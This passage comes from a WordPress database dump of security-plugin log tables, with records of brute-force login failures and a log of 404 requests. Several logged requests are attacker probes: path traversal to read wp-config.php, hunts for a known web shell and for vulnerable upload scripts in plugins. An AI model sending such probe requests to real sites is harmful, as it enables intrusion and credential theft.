(104160, 1500357165.302938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1386744982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104161, 1500357616.524217, 1, 'loginFailValidUsername', 'admin', 1, 598145435, ''),
(104162, 1500363061.936690, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307817850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104163, 1500363063.634922, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1307817850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104164, 1500363287.550571, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892314052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104165, 1500363289.262796, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892314052, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104166, 1500365654.083218, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1422229100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104167, 1500366335.119333, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1675806400, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104168, 1500366336.239731, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1675806400, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104169, 1500366366.795677, 1, 'loginFailValidUsername', 'admin', 1, 885815617, ''),
(104170, 1500370027.152613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3144166239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104171, 1500370029.040774, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3144166239, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104172, 1500370205.941696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831962742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104173, 1500370207.882396, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831962742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104174, 1500371201.852307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1327110560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104175, 1500371202.885237, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1327110560, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104176, 1500373329.811727, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_45_92) AppleWebKit/532.86.33 (KHTML, like Gecko) Chrome/56.3.7455.2183 Safari/533.25 Edge/36.10044'),
(104177, 1500376266.423398, 1, 'loginFailValidUsername', 'admin', 1, 598069797, ''),
(104178, 1500381656.427769, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978650888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104179, 1500381660.629932, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978650888, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104180, 1500383300.968534, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1486653111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104181, 1500383302.008165, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1486653111, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104182, 1500383818.886970, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1459974947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104183, 1500383819.914898, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1459974947, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104184, 1500386439.443117, 1, 'loginFailValidUsername', 'admin', 1, 885815617, ''),
(104185, 1500390057.373496, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3680266720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104186, 1500390364.250662, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1378840677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104187, 1500390365.210237, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1378840677, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104188, 1500391388.192385, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754861785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104189, 1500391389.519409, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3754861785, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104190, 1500391517.409708, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3577159483, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104191, 1500391520.438470, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3577159483, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104192, 1500394768.994487, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2961775105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104193, 1500394770.362223, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2961775105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104194, 1500395058.246965, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1969622199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104195, 1500395059.981879, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1969622199, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104196, 1500395995.369561, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1296412301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104197, 1500395996.643198, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1296412301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104198, 1500397437.580254, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1324837478, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104199, 1500397669.289288, 1, 'loginFailValidUsername', 'admin', 1, 911757147, ''),
(104200, 1500401706.940554, 1, 'loginFailValidUsername', 'admin', 1, 17373758, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(104201, 1500402316.683915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 457956911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104202, 1500402318.205792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 457956911, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104203, 1500402827.799204, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415233868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104204, 1500402829.032020, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415233868, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104205, 1500405775.686854, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036543082, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104206, 1500405777.236035, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036543082, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104207, 1500405942.209733, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3120992176, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104208, 1500405943.413406, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3120992176, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104209, 1500407359.217840, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014938320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104210, 1500407360.655741, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3014938320, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104211, 1500411035.853697, 1, 'loginFailValidUsername', 'admin', 1, 3410419836, ''),
(104212, 1500411654.226908, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503345003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104213, 1500411655.252547, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1503345003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104214, 1500412928.859042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1832917706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104215, 1500412929.960424, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1832917706, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104216, 1500413274.664307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424303882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104217, 1500413275.742095, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1424303882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104218, 1500415346.282178, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3269181341, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104219, 1500418734.354244, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3001782822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104220, 1500418736.141359, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3001782822, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104221, 1500422585.264602, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697295223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104222, 1500422587.944793, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 697295223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104223, 1500423271.361978, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1317212049, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104224, 1500423272.411882, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1317212049, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104225, 1500423790.273988, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3695954925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104226, 1500423792.798434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3695954925, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104227, 1500424839.688633, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/534.18.55 (KHTML, like Gecko) Chrome/57.5.0685.5313 Safari/534.47'),
(104228, 1500425696.684802, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3015536834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104229, 1500425698.227497, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3015536834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104230, 1500433591.009867, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3178793580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104231, 1500433592.515426, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3178793580, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104232, 1500435283.026157, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1935868403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104233, 1500435284.654467, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1935868403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104234, 1500435402.303609, 1, 'loginFailValidUsername', 'admin', 1, 247468505, ''),
(104235, 1500437464.039455, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142118403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104236, 1500437465.486477, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142118403, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104237, 1500437797.471676, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3359800449, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104238, 1500437798.996222, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3359800449, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104239, 1500438526.813351, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945508724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104240, 1500438528.456123, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2945508724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104241, 1500438976.315699, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182036186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104242, 1500438978.133647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182036186, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104243, 1500439416.146613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107989375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104244, 1500439419.945215, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107989375, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104245, 1500442432.376336, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2110869389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104246, 1500442435.939973, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2110869389, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104247, 1500442794.161257, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1435463714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104248, 1500442795.283239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1435463714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104249, 1500443638.274911, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995672607, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104250, 1500443640.054962, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995672607, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104251, 1500444483.789366, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2637302370, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104252, 1500444485.197091, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2637302370, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104253, 1500444655.195091, 1, 'loginFailValidUsername', 'admin', 1, 3120616689, ''),
(104254, 1500446782.297606, 1, 'loginFailValidUsername', 'admin', 1, 3114828415, ''),
(104255, 1500448349.085174, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3413342434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104256, 1500448350.938286, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3413342434, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104257, 1500449303.561961, 1, 'loginFailValidUsername', 'admin', 1, 1368753261, ''),
(104258, 1500449777.374416, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201796910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(104259, 1500449778.883890, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3201796910, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104260, 1500451343.383943, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 973658906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104261, 1500451345.828338, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 973658906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104262, 1500451995.065015, 1, 'loginFailValidUsername', 'admin', 1, 1711219883, ''),
(104263, 1500453376.678293, 1, 'loginFailValidUsername', 'admin', 1, 3351375892, '');

-- --------------------------------------------------------

--
-- Structure de la table `wp_wfNet404s`
--

CREATE TABLE `wp_wfNet404s` (
  `sig` binary(16) NOT NULL,
  `ctime` int(10) UNSIGNED NOT NULL,
  `URI` varchar(1000) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_wfNet404s`
--

INSERT INTO `wp_wfNet404s` (`sig`, `ctime`, `URI`) VALUES
(0x6c27fc60c32252f4f8f2dd040e2caf30, 1466915210, '/wp-content/themes/figero/images/favicon.ico'),
(0xabcc19dba592ed3bad4fb6d9f3151998, 1466921545, '/wp-content/uploads/wpcf7_captcha/508111640.png'),
(0xef8371326febc29eefc703d7c4f35942, 1466924964, '/wp-content/uploads/wpcf7_captcha/553935450.png'),
(0xe83a391d8cb78038421fa26014c78c8f, 1466927442, '/wp-content/plugins/wp-symposium/server/php/index.php'),
(0xf51fe7808e1ada4f7aa3bda04f18b17d, 1466959257, '/.well-known/apple-app-site-association'),
(0xfd1e09fe095dd3e689f68833393fbf5c, 1466959257, '/apple-app-site-association'),
(0x00630e1e9221e9fdf19bddc9fcaa6897, 1466985121, '/.well-known/assetlinks.json'),
(0x86222b93a570c5ee284fb59f44b1f48b, 1467022161, '/wp-content/themes/photocrati-theme-v4.07/style.css'),
(0x3c2f3578edd0a530b486c17268b296b9, 1467027378, '/setup.php'),
(0x1bdab006cccb98477ad41eb26b3478f4, 1467046866, '/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?path=./&action=upload_ad_image'),
(0x0b7b480b9ee42fd8ea55fa25393f8b5d, 1467075861, '/sitemap.xml'),
(0x4115ca5901f30a246446793b43095c7e, 1467081590, '/wp-content/themes/dandelion/style.css'),
(0xcb8354179438508b804d07092fe2855e, 1467096758, '/wp-includes/class.wp-date.php'),
(0xcc95be3e665a25cf8b5a7bc2a929b0b3, 1467133216, '/apple-touch-icon-precomposed.png'),
(0xff273ec96a88f690e3c10ed03f0b3790, 1467133217, '/apple-touch-icon.png'),
(0xb16e49f2afa29176349b03ced0ece0d1, 1467186487, '/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php'),
(0x3b9004fa8a8ed530003eac3fabe4b593, 1467224323, '/wp-content/themes/Dandelion/functions/upload-handler.php'),
(0x667f505d1a07be82502dfb89dcf3e176, 1467232491, '/wp-content/plugins/revslider/temp/update_extract/'),
(0x0dc4f1ce23b653fa8901537c19666cc2, 1467311142, '/wp-content/themes/Dandelion/style.css'),
(0xb912eefb069fe1a81f159c9d79198ab3, 1467319104, '/wp-content/b374k-2.8.php'),
(0x04666fbd6b8c8f0d2b02882e7adf340d, 1467358575, '/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php'),
(0x909548c9cc82e20ddc896a380d229c86, 1467470240, '/wp-content/themes/twentyfifteen/404.php'),
(0x444ee2b4c84160aaa5c68776562d7c50, 1467505260, '/comments/feed/'),
(0x49dca947efbccdf6020e7927406d3406, 1467620405, '/wp-content/themes/twentyten/404.php'),
(0xf48858e50e98879b1197ba7661c1f4ce, 1467657325, '/sites/all/libraries/elfinder/connectors/php/connector.php'),
(0x12089bf26d91768c7d5ad4f44b19bd5d, 1467661498, '/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php'),
(0xe25dbd8a55559461ba0dc4ebe74b86b1, 1467673619, '/wp-checking.php'),
(0xa09d4b3e92bff859738dd3159f29be4d, 1467673619, '/wp-check.php'),
(0xc029828cd72926db2913dff29f54abef, 1467674785, '/wp-content/themes/figero/js/\\\'+url+\\\''),
(0xa7ceb703d70f80ae0986c321ac658b05, 1467740688, '/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'),
(0x613d31d50e4c0e8802e524b7ac68a067, 1467744694, '/wp-content/plugins/gallery-plugin/upload/php.php'),
(0x97e8d5cfbae6f2f47cc232f59c936c10, 1467746454, '/wp-content/themes/dimension/style.css'),
(0xabe0b00eb823129b747d1e84c898a76a, 1467822195, '/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/js/main.js'),
(0xbd524b3ea9638c1d8415b6739c7e240c, 1467862332, '/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php'),
(0x93dbf03e955d8eb9763f00993ce4b747, 1467910024, '/uploadify/uploadify.css'),
(0x8f5958020dc124310661a66a89a52bd4, 1467928909, '/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php'),
(0xe37ea32533b576f19fe0d52770d5f3fa, 1467965826, '/wp-content/uploads/wpcf7_captcha/2038006399.png'),
(0x2f8bc11a9a8ac565c4593868ccd773cc, 1467973145, '/wp-content/uploads/wpcf7_captcha/72019733.png'),
(0xd294bf5286da4a6184c4fbb587fae349, 1467977478, '/uploadify/uploadify.php'),
(0xa753f175a51c5c6a18b0a9bd6109a4fe, 1467999276, '/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/js/main.js'),
(0x02032c4b4b464564aea47bfa0851337b, 1468035369, '/wp-content/themes/anthology/functions/upload-handler.php'),
(0x331524f574faefa22b838833aa5ac4da, 1468047550, '/apple-touch-icon-120x120-precomposed.png'),
(0xc55ef3c565a5f8a5abc9425fde5a0f51, 1468047551, '/apple-touch-icon-120x120.png'),
(0x2c1f09e2d8d7ff3cffa8d0f9b11d4eee, 1468057604, '/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php'),
(0x361e27e46919994e45155c0445101435, 1468087417, '/wp-content/themes/corporate/404.php'),
(0x5204507a6e25c4aee83a571d47a43292, 1468140727, '/wp-content/themes/qualifire/style.css'),
(0x01c66ab8dddf43294dcce65fbb1223eb, 1468149144, '/wp-content/plugins/foxypress/uploadify/uploadify.php'),
(0x9d22b61243866f8447a017475fbbf058, 1468160292, '/wp-content/uploads/wpcf7_captcha/2033726340.png'),
(0x947a2146aa8f55279b5c389be692fbce, 1468243981, '/wp-content/themes/license.php'),
(0x28be95902b2979fd09f6f7454e3f15a1, 1468259168, '/wp-content/themes/kernel-theme/functions/upload-handler.php'),
(0x2409fc33f776b0d7e509eb95f5ea314d, 1468326334, '/wp-content/plugins/mailpress/readme.txt'),
(0x7bb784586f6771430614c498db1fd020, 1468327421, '/wp-content/themes/famous/style.css'),
(0x7957667ebbc7a27c2bf2ab412fd115a0, 1468333402, '/wp-content/plugins/work-the-flow-file-upload/public/assets/js/public.js'),
(0x9fe400c2f864dea91286271684d9644f, 1468364879, '/wp-content/plugins/front-file-manager/lib/plupload/js/plupload.js'),
(0xae38c4da99a44d234b70477a202f4889, 1468400992, '/wp-content/plugins/wp-mobile-detector/cache/css.php'),
(0x165b403014e723cba340a353d012d246, 1468407183, '/wp-content/uploads/wpcf7_captcha/306896323.png'),
(0xb08b6073fa1748efc43545e72cc421e6, 1468409761, '/wp-content/themes/twentyeleven/download.php?filename=../../../../../wp-config.php'),
(0x02a28d3ae319764e3c470c09e86a6110, 1468419234, '/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php'),
(0x139137b2f820abb7231ddafefa99145e, 1468439238, '/wp-admin/user/system.php'),
(0x3880fe7661d828e6b6971651a6197868, 1468439239, '/wp-content/themes/profoblog20/functions/jquery-ui/thumbs.php'),
(0xfbc805c68cd5cda2e47a1910e5de052f, 1468439239, '/wp-content/themes/profoblog20/js/helpers/thumbs.php'),
(0xfa4f4c2b918f9ec349cb16cadefccf17, 1468439239, '/wp-content/themes/twentyfourteen/genericons/font/thumbs.php'),
(0x1c58674e6ef55abd370f3db4ec261d51, 1468439239, '/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/thumbs.php'),
(0x4dc3b8acb5feaaa934affb308b4ee8ba, 1468439239, '/wp-content/languages/themes/sys.php'),
(0xdf3abeffea236ba86dfeaeff33d845ad, 1468439239, '/wp-content/themes/profoblog20/functions/colorpicker/thumbs.php'),
(0x6a1f2868a4570a28d18a5a5421684f73, 1468439239, '/wp-content/themes/profoblog20/functions/jquery-ui/css/ui-lightness/ini.php'),
(0x2f330d6df49072ad01a160faf1667551, 1468439239, '/wp-includes/js/jcrop/sys.php'),
(0x3bb91fd8c56d6d449a9e91ffb489b21f, 1468439239, '/wp-includes/js/crop/sys.php'),
(0x30293319a05e308a87f0f0aedbd5fc93, 1468439280, '/wp-includes/js/system.php'),
(0x9a8a03af7eb47130a0f0a070b91e4440, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/ini.php'),
(0xcf75c04d6e64621a84b00a2bda11f57b, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/thumbs.php'),
(0xeb5b8c0e9fed5854037f831fd84626b6, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/ini.php'),
(0x4a3fa8e0d8dce242cae992c34ce3701f, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/o2k7/ini.php'),
(0x172514974dc6308afb9d31eb7adbc5f5, 1468439280, '/wp-includes/js/tinymce/themes/advanced/skins/highcontrast/thumbs.php'),
(0xf2e7c67c6b9d8241778589909a1510bd, 1468439280, '/wp-includes/js/tinymce/themes/advanced/thumbs.php'),
